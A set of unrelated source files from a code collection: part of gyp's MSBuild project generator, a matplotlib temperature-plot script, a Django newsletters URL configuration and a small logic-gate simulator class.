self.depends_on = self.rule_name + 'DependsOn'
self.compute_output = 'Compute%sOutput' % self.rule_name
self.dirs_to_make = self.rule_name + 'DirsToMake'
self.tlog = self.rule_name + '_tlog'
self.extension = rule['extension']
if not self.extension.startswith('.'):
self.extension = '.' + self.extension
self.description = MSVSSettings.ConvertVCMacrosToMSBuild(
rule.get('message', self.rule_name))
old_additional_dependencies = _FixPaths(rule.get('inputs', []))
self.additional_dependencies = (
';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_additional_dependencies]))
old_outputs = _FixPaths(rule.get('outputs', []))
self.outputs = ';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_outputs])
old_command = _BuildCommandLineForRule(spec, rule, has_input_path=True)
self.command = MSVSSettings.ConvertVCMacrosToMSBuild(old_command)
def _GenerateMSBuildRulePropsFile(props_path, msbuild_rules):
"""Generate the .props file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'}]
for rule in msbuild_rules:
content.extend([
['PropertyGroup',
{'Condition': "'$(%s)' == '' and '$(%s)' == '' and "
"'$(ConfigurationType)' != 'Makefile'" % (rule.before_targets,
rule.after_targets)
},
[rule.before_targets, 'Midl'],
[rule.after_targets, 'CustomBuild'],
],
['PropertyGroup',
[rule.depends_on,
{'Condition': "'$(ConfigurationType)' != 'Makefile'"},
'_SelectedFiles;$(%s)' % rule.depends_on
],
],
['ItemDefinitionGroup',
[rule.rule_name,
['CommandLineTemplate', rule.command],
['Outputs', rule.outputs],
['ExecutionDescription', rule.description],
['AdditionalDependencies', rule.additional_dependencies],
],
]
])
easy_xml.WriteXmlIfChanged(content, props_path)
def _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules):
"""Generate the .targets file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
}
]
item_group = [
'ItemGroup',
['PropertyPageSchema',
{'Include': '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'}
]
]
for rule in msbuild_rules:
item_group.append(
['AvailableItemName',
{'Include': rule.rule_name},
['Targets', rule.target_name],
])
content.append(item_group)
for rule in msbuild_rules:
content.append(
['UsingTask',
{'TaskName': rule.rule_name,
'TaskFactory': 'XamlTaskFactory',
'AssemblyName': 'Microsoft.Build.Tasks.v4.0'
},
['Task', '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'],
])
for rule in msbuild_rules:
rule_name = rule.rule_name
target_outputs = '%%(%s.Outputs)' % rule_name
target_inputs = ('%%(%s.Identity);%%(%s.AdditionalDependencies);'
'$(MSBuildProjectFile)') % (rule_name, rule_name)
rule_inputs = '%%(%s.Identity)' % rule_name
extension_condition = ("'%(Extension)'=='.obj' or "
"'%(Extension)'=='.res' or "
"'%(Extension)'=='.rsc' or "
"'%(Extension)'=='.lib'")
remove_section = [
'ItemGroup',
{'Condition': "'@(SelectedFiles)' != ''"},
[rule_name,
{'Remove': '@(%s)' % rule_name,
'Condition': "'%(Identity)' != '@(SelectedFiles)'"
}
]
]
logging_section = [
'ItemGroup',
[rule.tlog,
{'Include': '%%(%s.Outputs)' % rule_name,
'Condition': ("'%%(%s.Outputs)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" %
(rule_name, rule_name))
},
['Source', "@(%s, '|')" % rule_name],
],
]
message_section = [
'Message',
{'Importance': 'High',
'Text': '%%(%s.ExecutionDescription)' % rule_name
}
]
write_lines_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).write.1.tlog',
'Lines': "^%%(%s.Source);@(%s->'%%(Fullpath)')" % (rule.tlog,
rule.tlog)
}
]
command_and_input_section = [
rule_name,
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule_name, rule_name),
'CommandLineTemplate': '%%(%s.CommandLineTemplate)' % rule_name,
'AdditionalOptions': '%%(%s.AdditionalOptions)' % rule_name,
'Inputs': rule_inputs
}
]
content.extend([
['Target',
{'Name': rule.target_name,
'BeforeTargets': '$(%s)' % rule.before_targets,
'AfterTargets': '$(%s)' % rule.after_targets,
'Condition': "'@(%s)' != ''" % rule_name,
'DependsOnTargets': '$(%s);%s' % (rule.depends_on,
rule.compute_output),
'Outputs': target_outputs,
'Inputs': target_inputs
},
remove_section,
logging_section,
message_section,
write_lines_section,
command_and_input_section,
],
['PropertyGroup',
['ComputeLinkInputsTargets',
'$(ComputeLinkInputsTargets);',
'%s;' % rule.compute_output
],
['ComputeLibInputsTargets',
'$(ComputeLibInputsTargets);',
'%s;' % rule.compute_output
],
],
['Target',
{'Name': rule.compute_output,
'Condition': "'@(%s)' != ''" % rule_name
},
['ItemGroup',
[rule.dirs_to_make,
{'Condition': "'@(%s)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" % (rule_name, rule_name),
'Include': '%%(%s.Outputs)' % rule_name
}
],
['Link',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['Lib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['ImpLib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
],
['MakeDir',
{'Directories': ("@(%s->'%%(RootDir)%%(Directory)')" %
rule.dirs_to_make)
}
]
],
])
easy_xml.WriteXmlIfChanged(content, targets_path)
def _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules):
# Generate the .xml file
content = [
'ProjectSchemaDefinitions',
{'xmlns': ('clr-namespace:Microsoft.Build.Framework.XamlTypes;'
'assembly=Microsoft.Build.Framework'),
'xmlns:x': 'http://schemas.microsoft.com/winfx/2006/xaml',
'xmlns:sys': 'clr-namespace:System;assembly=mscorlib',
'xmlns:transformCallback':
'Microsoft.Cpp.Dev10.ConvertPropertyCallback'
}
]
for rule in msbuild_rules:
content.extend([
['Rule',
{'Name': rule.rule_name,
'PageTemplate': 'tool',
'DisplayName': rule.display_name,
'Order': '200'
},
['Rule.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name
}
]
],
['Rule.Categories',
['Category',
{'Name': 'General'},
['Category.DisplayName',
['sys:String', 'General'],
],
],
['Category',
{'Name': 'Command Line',
'Subtype': 'CommandLine'
},
['Category.DisplayName',
['sys:String', 'Command Line'],
],
],
],
['StringListProperty',
{'Name': 'Inputs',
'Category': 'Command Line',
'IsRequired': 'true',
'Switch': ' '
},
['StringListProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name,
'SourceType': 'Item'
}
]
],
],
['StringProperty',
{'Name': 'CommandLineTemplate',
'DisplayName': 'Command Line',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['DynamicEnumProperty',
{'Name': rule.before_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute Before'],
],
['DynamicEnumProperty.Description',
['sys:String', 'Specifies the targets for the build customization'
' to run before.'
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.before_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'HasConfigurationCondition': 'true'
}
]
],
],
['DynamicEnumProperty',
{'Name': rule.after_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute After'],
],
['DynamicEnumProperty.Description',
['sys:String', ('Specifies the targets for the build customization'
' to run after.')
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.after_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': '',
'HasConfigurationCondition': 'true'
}
]
],
],
['StringListProperty',
{'Name': 'Outputs',
'DisplayName': 'Outputs',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringProperty',
{'Name': 'ExecutionDescription',
'DisplayName': 'Execution Description',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringListProperty',
{'Name': 'AdditionalDependencies',
'DisplayName': 'Additional Dependencies',
'IncludeInCommandLine': 'False',
'Visible': 'false'
}
],
['StringProperty',
{'Subtype': 'AdditionalOptions',
'Name': 'AdditionalOptions',
'Category': 'Command Line'
},
['StringProperty.DisplayName',
['sys:String', 'Additional Options'],
],
['StringProperty.Description',
['sys:String', 'Additional Options'],
],
],
],
['ItemType',
{'Name': rule.rule_name,
'DisplayName': rule.display_name
}
],
['FileExtension',
{'Name': '*' + rule.extension,
'ContentType': rule.rule_name
}
],
['ContentType',
{'Name': rule.rule_name,
'DisplayName': '',
'ItemType': rule.rule_name
}
]
])
easy_xml.WriteXmlIfChanged(content, xml_path)
def _GetConfigurationAndPlatform(name, settings):
configuration = name.rsplit('_', 1)[0]
platform = settings.get('msvs_configuration_platform', 'Win32')
return (configuration, platform)
def _GetConfigurationCondition(name, settings):
return (r"'$(Configuration)|$(Platform)'=='%s|%s'" %
_GetConfigurationAndPlatform(name, settings))
def _GetMSBuildProjectConfigurations(configurations):
group = ['ItemGroup', {'Label': 'ProjectConfigurations'}]
for (name, settings) in sorted(configurations.iteritems()):
configuration, platform = _GetConfigurationAndPlatform(name, settings)
designation = '%s|%s' % (configuration, platform)
group.append(
['ProjectConfiguration', {'Include': designation},
['Configuration', configuration],
['Platform', platform]])
return [group]
def _GetMSBuildGlobalProperties(spec, guid, gyp_file_name):
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
target_name = prefix + product_name
namespace = os.path.splitext(gyp_file_name)[0]
return [
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', guid],
['Keyword', 'Win32Proj'],
['RootNamespace', namespace],
['TargetName', target_name],
]
]
def _GetMSBuildConfigurationDetails(spec, build_file):
properties = {}
for name, settings in spec['configurations'].iteritems():
msbuild_attributes = _GetMSBuildAttributes(spec, settings, build_file)
condition = _GetConfigurationCondition(name, settings)
character_set = msbuild_attributes.get('CharacterSet')
_AddConditionalProperty(properties, condition, 'ConfigurationType',
msbuild_attributes['ConfigurationType'])
if character_set:
_AddConditionalProperty(properties, condition, 'CharacterSet',
character_set)
return _GetMSBuildPropertyGroup(spec, 'Configuration', properties)
def _GetMSBuildPropertySheets(configurations):
user_props = r'$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props'
return [
['ImportGroup',
{'Label': 'PropertySheets'},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
]
def _GetMSBuildAttributes(spec, config, build_file):
# Use the MSVS attributes and convert them. In the future, we may want to
# support Gyp files specifying 'msbuild_configuration_attributes' directly.
config_type = _GetMSVSConfigurationType(spec, build_file)
msvs_attributes = _GetMSVSAttributes(spec, config, config_type)
msbuild_attributes = {}
for a in msvs_attributes:
if a in ['IntermediateDirectory', 'OutputDirectory']:
directory = MSVSSettings.ConvertVCMacrosToMSBuild(msvs_attributes[a])
if not directory.endswith('\\'):
directory += '\\'
msbuild_attributes[a] = directory
elif a == 'CharacterSet':
msbuild_attributes[a] = {
'0': 'MultiByte',
'1': 'Unicode'
}[msvs_attributes[a]]
elif a == 'ConfigurationType':
msbuild_attributes[a] = {
'1': 'Application',
'2': 'DynamicLibrary',
'4': 'StaticLibrary',
'10': 'Utility'
}[msvs_attributes[a]]
else:
print 'Warning: Do not know how to convert MSVS attribute ' + a
return msbuild_attributes
def _GetMSBuildConfigurationGlobalProperties(spec, configurations, build_file):
# TODO(jeanluc) We could optimize out the following and do it only if
# there are actions.
# TODO(jeanluc) Handle the equivalent of setting 'CYGWIN=nontsec'.
new_paths = []
cygwin_dirs = spec.get('msvs_cygwin_dirs', ['.'])[0]
if cygwin_dirs:
cyg_path = '$(MSBuildProjectDirectory)\\%s\\bin\\' % _FixPath(cygwin_dirs)
new_paths.append(cyg_path)
# TODO(jeanluc) Change the convention to have both a cygwin_dir and a
# python_dir.
python_path = cyg_path.replace('cygwin\\bin', 'python_26')
new_paths.append(python_path)
if new_paths:
new_paths = '$(ExecutablePath);' + ';'.join(new_paths)
properties = {}
for (name, configuration) in sorted(configurations.iteritems()):
condition = _GetConfigurationCondition(name, configuration)
attributes = _GetMSBuildAttributes(spec, configuration, build_file)
msbuild_settings = configuration['finalized_msbuild_settings']
_AddConditionalProperty(properties, condition, 'IntDir',
attributes['IntermediateDirectory'])
_AddConditionalProperty(properties, condition, 'OutDir',
attributes['OutputDirectory'])
if new_paths:
_AddConditionalProperty(properties, condition, 'ExecutablePath',
new_paths)
tool_settings = msbuild_settings.get('', {})
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild('', name, value)
_AddConditionalProperty(properties, condition, name, formatted_value)
return _GetMSBuildPropertyGroup(spec, None, properties)
def _AddConditionalProperty(properties, condition, name, value):
"""Adds a property / conditional value pair to a dictionary.
Arguments:
properties: The dictionary to be modified. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
condition: The condition under which the named property has the value.
name: The name of the property.
value: The value of the property.
"""
if name not in properties:
properties[name] = {}
values = properties[name]
if value not in values:
values[value] = []
conditions = values[value]
conditions.append(condition)
def _GetMSBuildPropertyGroup(spec, label, properties):
"""Returns a PropertyGroup definition for the specified properties.
Arguments:
spec: The target project dict.
label: An optional label for the PropertyGroup.
properties: The dictionary to be converted. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
"""
group = ['PropertyGroup']
if label:
group.append({'Label': label})
num_configurations = len(spec['configurations'])
for name, values in sorted(properties.iteritems()):
for value, conditions in sorted(values.iteritems()):
if len(conditions) == num_configurations:
# If the value is the same all configurations,
# just add one unconditional entry.
group.append([name, value])
else:
for condition in conditions:
group.append([name, {'Condition': condition}, value])
return [group]
def _GetMSBuildToolSettingsSections(spec, configurations):
groups = []
for (name, configuration) in sorted(configurations.iteritems()):
msbuild_settings = configuration['finalized_msbuild_settings']
group = ['ItemDefinitionGroup',
{'Condition': _GetConfigurationCondition(name, configuration)}
]
for tool_name, tool_settings in sorted(msbuild_settings.iteritems()):
# Skip the tool named '' which is a holder of global settings handled
# by _GetMSBuildConfigurationGlobalProperties.
if tool_name:
if tool_settings:
tool = [tool_name]
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild(tool_name, name,
value)
tool.append([name, formatted_value])
group.append(tool)
groups.append(group)
return groups
def _FinalizeMSBuildSettings(spec, configuration):
if 'msbuild_settings' in configuration:
converted = False
msbuild_settings = configuration['msbuild_settings']
MSVSSettings.ValidateMSBuildSettings(msbuild_settings)
else:
converted = True
msvs_settings = configuration.get('msvs_settings', {})
msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(msvs_settings)
include_dirs, resource_include_dirs = _GetIncludeDirs(configuration)
libraries = _GetLibraries(spec)
out_file, _, msbuild_tool = _GetOutputFilePathAndTool(spec)
defines = _GetDefines(configuration)
if converted:
# Visual Studio 2010 has TR1
defines = [d for d in defines if d != '_HAS_TR1=0']
# Warn of ignored settings
ignored_settings = ['msvs_prebuild', 'msvs_postbuild', 'msvs_tool_files']
for ignored_setting in ignored_settings:
value = configuration.get(ignored_setting)
if value:
print ('Warning: The automatic conversion to MSBuild does not handle '
'%s. Ignoring setting of %s' % (ignored_setting, str(value)))
defines = [_EscapeCppDefineForMSBuild(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(configuration)
# TODO(jeanluc) Validate & warn that we don't translate
# prebuild = configuration.get('msvs_prebuild')
# postbuild = configuration.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = configuration.get('msvs_precompiled_header')
# Add the information to the appropriate tool
# TODO(jeanluc) We could optimize and generate these settings only if
# the corresponding files are found, e.g. don't generate ResourceCompile
# if you don't have any resources.
_ToolAppend(msbuild_settings, 'ClCompile',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(msbuild_settings, 'Link', 'AdditionalDependencies', libraries)
if out_file:
_ToolAppend(msbuild_settings, msbuild_tool, 'OutputFile', out_file,
only_if_unset=True)
# Add defines.
_ToolAppend(msbuild_settings, 'ClCompile',
'PreprocessorDefinitions', defines)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'PreprocessorDefinitions', defines)
# Add disabled warnings.
_ToolAppend(msbuild_settings, 'ClCompile',
'DisableSpecificWarnings', disabled_warnings)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(msbuild_settings, 'ClCompile', 'PrecompiledHeader', 'Use')
_ToolAppend(msbuild_settings, 'ClCompile',
'PrecompiledHeaderFile', precompiled_header)
_ToolAppend(msbuild_settings, 'ClCompile',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(msbuild_settings, '', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(msbuild_settings, 'Link', 'ModuleDefinitionFile', def_file)
configuration['finalized_msbuild_settings'] = msbuild_settings
def _GetValueFormattedForMSBuild(tool_name, name, value):
if type(value) == list:
# For some settings, VS2010 does not automatically extends the settings
# TODO(jeanluc) Is this what we want?
if name in ['AdditionalDependencies',
'AdditionalIncludeDirectories',
'AdditionalLibraryDirectories',
'AdditionalOptions',
'DelayLoadDLLs',
'DisableSpecificWarnings',
'PreprocessorDefinitions']:
value.append('%%(%s)' % name)
# For most tools, entries in a list should be separated with ';' but some
# settings use a space. Check for those first.
exceptions = {
'ClCompile': ['AdditionalOptions'],
'Link': ['AdditionalOptions'],
'Lib': ['AdditionalOptions']}
if tool_name in exceptions and name in exceptions[tool_name]:
char = ' '
else:
char = ';'
formatted_value = char.join(
[MSVSSettings.ConvertVCMacrosToMSBuild(i) for i in value])
else:
formatted_value = MSVSSettings.ConvertVCMacrosToMSBuild(value)
return formatted_value
def _VerifySourcesExist(sources, root_dir):
"""Verifies that all source files exist on disk.
Checks that all regular source files, i.e. not created at run time,
exist on disk. Missing files cause needless recompilation but no otherwise
visible errors.
Arguments:
sources: A recursive list of Filter/file names.
root_dir: The root directory for the relative path names.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
_VerifySourcesExist(source.contents, root_dir)
else:
if '$' not in source:
full_path = os.path.join(root_dir, source)
if not os.path.exists(full_path):
print 'Warning: Missing input file ' + full_path + ' pwd=' +\
os.getcwd()
def _GetMSBuildSources(spec, sources, exclusions, extension_to_rule_name,
actions_spec, sources_handled_by_action):
groups = ['none', 'midl', 'include', 'compile', 'resource', 'rule']
grouped_sources = {}
for g in groups:
grouped_sources[g] = []
_AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action)
sources = []
for g in groups:
if grouped_sources[g]:
sources.append(['ItemGroup'] + grouped_sources[g])
if actions_spec:
sources.append(['ItemGroup'] + actions_spec)
return sources
def _AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action):
extensions_excluded_from_precompile = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
_AddSources2(spec, source.contents, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action)
else:
if not source in sources_handled_by_action:
detail = []
excluded_configurations = exclusions.get(source, [])
if len(excluded_configurations) == len(spec['configurations']):
detail.append(['ExcludedFromBuild', 'true'])
else:
for config_name, configuration in sorted(excluded_configurations):
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['ExcludedFromBuild',
{'Condition': condition},
'true'])
# Add precompile if needed
for config_name, configuration in spec['configurations'].iteritems():
precompiled_source = configuration.get('msvs_precompiled_source', '')
if precompiled_source != '':
precompiled_source = _FixPath(precompiled_source)
if not extensions_excluded_from_precompile:
# If the precompiled header is generated by a C source, we must
# not try to use it for C++ sources, and vice versa.
basename, extension = os.path.splitext(precompiled_source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
if precompiled_source == source:
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['PrecompiledHeader',
{'Condition': condition},
'Create'
])
else:
# Turn off precompiled header usage for source files of a
# different type than the file that generated the
# precompiled header.
for extension in extensions_excluded_from_precompile:
if source.endswith(extension):
detail.append(['PrecompiledHeader', ''])
detail.append(['ForcedIncludeFiles', ''])
group, element = _MapFileToMsBuildSourceType(source,
extension_to_rule_name)
grouped_sources[group].append([element, {'Include': source}] + detail)
def _GetMSBuildProjectReferences(project):
references = []
if project.dependencies:
group = ['ItemGroup']
for dependency in project.dependencies:
guid = dependency.guid
project_dir = os.path.split(project.path)[0]
relative_path = gyp.common.RelativePath(dependency.path, project_dir)
group.append(
['ProjectReference',
{'Include': relative_path},
['Project', guid],
['ReferenceOutputAssembly', 'false']
])
references.append(group)
return references
def _GenerateMSBuildProject(project, options, version):
spec = project.spec
configurations = spec['configurations']
project_dir, project_file_name = os.path.split(project.path)
msbuildproj_dir = os.path.dirname(project.path)
if msbuildproj_dir and not os.path.exists(msbuildproj_dir):
os.makedirs(msbuildproj_dir)
# Prepare list of sources and excluded sources.
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, gyp_file)
# Add rules for each configuration
actions_to_add = {}
props_files_of_rules = set()
targets_files_of_rules = set()
extension_to_rule_name = {}
_GenerateRulesForMSBuild(project_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(spec, options,
project_dir, sources,
excluded_sources))
_AddActions(actions_to_add, spec, project.build_file)
_AddCopies(actions_to_add, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
actions_spec, sources_handled_by_action = _GenerateActionsForMSBuild(
spec, actions_to_add)
_GenerateMSBuildFiltersFile(project.path + '.filters', sources,
extension_to_rule_name)
_VerifySourcesExist(sources, project_dir)
for (_, configuration) in configurations.iteritems():
_FinalizeMSBuildSettings(spec, configuration)
# Add attributes to root element
import_default_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.Default.props'}]]
import_cpp_props_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.props'}]]
import_cpp_targets_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.targets'}]]
macro_section = [['PropertyGroup', {'Label': 'UserMacros'}]]
content = [
'Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003',
'ToolsVersion': version.ProjectVersion(),
'DefaultTargets': 'Build'
}]
content += _GetMSBuildProjectConfigurations(configurations)
content += _GetMSBuildGlobalProperties(spec, project.guid, project_file_name)
content += import_default_section
content += _GetMSBuildConfigurationDetails(spec, project.build_file)
content += import_cpp_props_section
content += _GetMSBuildExtensions(props_files_of_rules)
content += _GetMSBuildPropertySheets(configurations)
content += macro_section
content += _GetMSBuildConfigurationGlobalProperties(spec, configurations,
project.build_file)
content += _GetMSBuildToolSettingsSections(spec, configurations)
content += _GetMSBuildSources(
spec, sources, exclusions, extension_to_rule_name, actions_spec,
sources_handled_by_action)
content += _GetMSBuildProjectReferences(project)
content += import_cpp_targets_section
content += _GetMSBuildExtensionTargets(targets_files_of_rules)
# TODO(jeanluc) File a bug to get rid of runas. We had in MSVS:
# has_run_as = _WriteMSVSUserFile(project.path, version, spec)
easy_xml.WriteXmlIfChanged(content, project.path)
def _GetMSBuildExtensions(props_files_of_rules):
extensions = ['ImportGroup', {'Label': 'ExtensionSettings'}]
for props_file in props_files_of_rules:
extensions.append(['Import', {'Project': props_file}])
return [extensions]
def _GetMSBuildExtensionTargets(targets_files_of_rules):
targets_node = ['ImportGroup', {'Label': 'ExtensionTargets'}]
for targets_file in sorted(targets_files_of_rules):
targets_node.append(['Import', {'Project': targets_file}])
return [targets_node]
def _GenerateActionsForMSBuild(spec, actions_to_add):
"""Add actions accumulated into an actions_to_add, merging as needed.
Arguments:
spec: the target project dict
actions_to_add: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
Returns:
A pair of (action specification, the sources handled by this action).
"""
sources_handled_by_action = set()
actions_spec = []
for primary_input, actions in actions_to_add.iteritems():
inputs = set()
outputs = set()
descriptions = []
commands = []
for action in actions:
inputs.update(set(action['inputs']))
outputs.update(set(action['outputs']))
descriptions.append(action['description'])
cmd = action['command']
# For most actions, add 'call' so that actions that invoke batch files
# return and continue executing. msbuild_use_call provides a way to
# disable this but I have not seen any adverse effect from doing that
# for everything.
if action.get('msbuild_use_call', True):
cmd = 'call ' + cmd
commands.append(cmd)
# Add the custom build action for one input file.
description = ', and also '.join(descriptions)
command = ' && '.join(commands)
_AddMSBuildAction(spec,
primary_input,
inputs,
outputs,
command,
description,
sources_handled_by_action,
actions_spec)
return actions_spec, sources_handled_by_action
def _AddMSBuildAction(spec, primary_input, inputs, outputs, cmd, description,
sources_handled_by_action, actions_spec):
command = MSVSSettings.ConvertVCMacrosToMSBuild(cmd)
primary_input = _FixPath(primary_input)
inputs_array = _FixPaths(inputs)
outputs_array = _FixPaths(outputs)
additional_inputs = ';'.join([i for i in inputs_array
if i != primary_input])
outputs = ';'.join(outputs_array)
sources_handled_by_action.add(primary_input)
action_spec = ['CustomBuild', {'Include': primary_input}]
action_spec.extend(
# TODO(jeanluc) 'Document' for all or just if as_sources?
[['FileType', 'Document'],
['Command', command],
['Message', description],
['Outputs', outputs]
])
if additional_inputs:
action_spec.append(['AdditionalInputs', additional_inputs])
actions_spec.append(action_spec)
| dtebbs/gyp | pylib/gyp/generator/msvs.py | Python | bsd-3-clause | 110,367 |
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.ticker as tkr
import datetime
import numpy as np
import csv
#x = np.array([datetime.datetime(2013, 9, 28, i, 0) for i in range(24)])
#y = np.random.randint(100, size=x.shape)
data = {}
# read data:
with open('temp_log.csv', 'rb') as csvfile:
logreader = csv.DictReader(csvfile, delimiter=';',quotechar='|', quoting=csv.QUOTE_MINIMAL)
for row in logreader:
for header, value in row.items():
try:
data[header].append(value)
except KeyError:
data[header] = [value]
# prepare data:
x = map(lambda x: datetime.datetime.fromtimestamp(int(x)), data['time'])
y = data['temp']
# actual plotting:
def xfmt(x,pos=None):
''' custom date formatting '''
x = mdates.num2date(x)
label = x.strftime('%m/%d')
label = label.lstrip('0')
return label
plt.plot(x,y)
plt.setp(plt.gca().xaxis.get_majorticklabels(),rotation=90)
plt.gca().xaxis.set_major_formatter(tkr.FuncFormatter(xfmt))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=4))
plt.gca().xaxis.set_minor_locator(mdates.DayLocator())
plt.show()
plt.savefig('temp_plot.png')
| stefan2904/raspberry-temperature | plot.py | Python | mit | 1,307 |
from django.urls import path
from . import views
app_name = "newsletters"
urlpatterns = [
path('', views.Index.as_view(template_name='newsletters/index.html'), name='newsletters_index'),
path('create/', views.Create.as_view(template_name='newsletters/create.html'), name='newsletters_create'),
path('<int:pk>/', views.Detail.as_view(template_name='newsletters/detail.html'), name='newsletters_detail'),
path('latest/', views.latest, name='newsletters_latest'),
path('edit/<int:pk>/', views.Update.as_view(template_name='newsletters/update.html'), name='newsletters_update'),
path('delete/<int:pk>/', views.Delete.as_view(template_name='newsletters/delete.html'), name='newsletters_delete'),
path('email-version/<int:pk>/', views.Preview.as_view(template_name='newsletters/email-version.html'),
name='newsletters_email'),
path('text-version/<int:pk>/', views.Detail.as_view(template_name='newsletters/plain-email-version.txt',
content_type="text/plain; charset=utf-8"),
name='newsletters_plaintext'),
]
| ashbc/tgrsite | newsletters/urls.py | Python | isc | 1,111 |
class Gate(object):
def clear_gate(self):
self.outputGateCalculated = False
class AndGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGateName = values[1].strip()
self.outputGate = 0
self.outputGateValue = 0
second_pass = values[0].split('AND')
self.inputGate1Name = second_pass[0].strip()
self.inputGate1 = 0
self.inputGate2Name = second_pass[1].strip()
self.inputGate2 = 0
self.outputGateCalculated = False
def __str__(self):
return "AndGate inputGate1 = {0}, inputGate2 = {1}, outputGate = {2}".format(self.inputGate1Name,
self.inputGate2Name,
self.outputGateName)
def hookup(self, gate_list):
if not self.inputGate1Name.isdigit():
input_gate1_attach = filter(filter_for_output_gate(self.inputGate1Name), gate_list)
self.inputGate1 = input_gate1_attach[0]
if not self.inputGate2Name.isdigit():
input_gate2_attach = filter(filter_for_output_gate(self.inputGate2Name), gate_list)
self.inputGate2 = input_gate2_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
if self.inputGate1Name.isdigit():
value1 = int(self.inputGate1Name)
else:
value1 = self.inputGate1.calculate_gate()
if self.inputGate2Name.isdigit():
value2 = int(self.inputGate2Name)
else:
value2 = self.inputGate2.calculate_gate()
self.outputGateValue = value1 & value2
self.outputGateCalculated = True
